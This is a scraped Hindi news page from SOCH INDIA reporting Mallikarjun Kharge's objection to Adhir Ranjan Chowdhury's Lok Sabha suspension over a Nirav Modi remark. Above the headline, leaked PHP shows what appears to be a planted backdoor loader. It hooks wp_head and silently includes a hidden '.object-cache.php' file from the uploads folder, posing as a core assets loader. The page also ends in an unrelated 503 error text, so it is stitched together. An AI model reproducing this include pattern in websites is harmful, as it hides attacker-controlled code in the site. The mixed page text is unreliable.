add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘नीरव का मतलब तो शांत होता है, इतनी बात पर सस्पेंड कौन करता है’, अधीर रंजन के सस्पेंशन पर बोले मल्लिकार्जुन खरगे – SOCH INDIA
Menu

देश
‘नीरव का मतलब तो शांत होता है, इतनी बात पर सस्पेंड कौन करता है’, अधीर रंजन के सस्पेंशन पर बोले मल्लिकार्जुन खरगे

nobanner

लोकसभा में कांग्रेस के नेता सदन अधीर रंजन चौधरी के सस्पेंशन का मामला राज्यसभा में भी उठा. राज्यसभा में नेता विपक्ष मल्लिकार्जुन खरगे ने शुक्रवार (11 अगस्त 2023) को कहा कि नीरव मोदी का नाम लेने पर आपने हमारे नेता को सस्पेंड कर दिया, इतनी सी बात पर सस्पेंड कौन करता है?

राज्यसभा में नेता विपक्ष मल्लिकार्जुन खरगे ने कहा, सदन में बहस के दौरान अगर कोई सदस्य असंसदीय शब्दों का इस्तेमाल करता है तो उसको वहीं पर टोकना चाहिए. उसके शब्दों को लेकर आपत्ति भी जताई जा सकती है लेकिन आपने लोकसभा में हमारे नेता को सस्पेंड कर दिया. नीरव का मतलब होता है शांत लेकिन आपने उनको इतनी सी बात पर सस्पेंड कर दिया.

लोकसभा में अधीर रंजन चौधरी ने क्या लांघी थी मर्यादा?
लोकसभा में बीजेपी ने गुरुवार (10 अगस्त 2023) को लोकसभा में कांग्रेस के नेता सदन अधीर रंजन चौधरी पर मर्यादा की सीमा लांघने का आरोप लगाया. बीजेपी ने कहा कि भाषण देते समय कांग्रेस नेता अधीर रंजन चौधरी ने पीएम मोदी को अपशब्द कहे और उनकी तुलना धृतराष्ट्र से की.

लोकसभा में क्या बोले थे कांग्रेस नेता अधीर रंजन चौधरी?
लोकसभा में कांग्रेस नेता अधीर रंजन चौधरी गुरुवार को अविश्वास प्रस्ताव पर भाषण दे रहे थे. इस दौरान उन्होंने पीएम मोदी की तुलना धृतराष्ट्र और भगोड़े व्यापारी नीरव मोदी से की. उनके इस बयान के बाद सदन में बैठे बीजेपी नेताओं ने उनके खिलाफ नारेबाजी शुरू कर दी और उनसे माफी मांगने को कहने लगे. हालांकि चौधरी के बयान के विवादित हिस्से को लोकसभा की कार्यवाही के रिकॉर्ड से हटा दिया गया है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.